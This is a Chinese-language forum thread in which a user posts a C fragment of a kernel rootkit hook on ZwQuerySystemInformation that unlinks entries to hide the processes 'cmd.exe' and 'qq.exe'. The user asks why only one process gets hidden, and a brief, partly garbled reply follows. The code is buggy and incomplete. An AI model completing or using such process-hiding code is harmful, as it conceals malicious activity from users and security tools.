|
阅读:1424回复:9
隐藏进程
我用驱网的ROOTKIT的技术隐藏两个进程
发现我只能隐藏其中的一个 代码如下: 在NTSTATUS NewZwQuerySystemInformation 函数中 struct _SYSTEM_PROCESSES *curr = (struct _SYSTEM_PROCESSES *)SystemInformation; struct _SYSTEM_PROCESSES *prev = NULL; while(curr) { if(0 == memcmp( process_name.Buffer, "cmd.exe", 7) || 0 == memcmp( process_name.Buffer, "qq.exe", 6) ) { if(prev) { if(curr->NextEntryDelta) { prev->NextEntryDelta += curr>NextEntryDelta; } else { prev->NextEntryDelta = 0; } } else { if(curr->NextEntryDelta) { (char *)SystemInformation += curr->NextEntryDelta; } else { SystemInformation = NULL; } } } prev = curr; if(curr->NextEntryDelta) ((char *)curr += curr->NextEntryDelta); else curr = NULL; } 大家看看有啥问题! |
|
最新喜欢: aasa2
|
|
沙发#
发布于:2004-11-27 10:42
toadwolf
你好! prev=curr 这里进行遍历, 找下一个要隐藏的节点 如果不对要整样改呢? aethercat 你好! 大小写是测试 你所说要扎处理呢? 那样改不对吗? 谢谢回付整样给你们分呢? |
|
|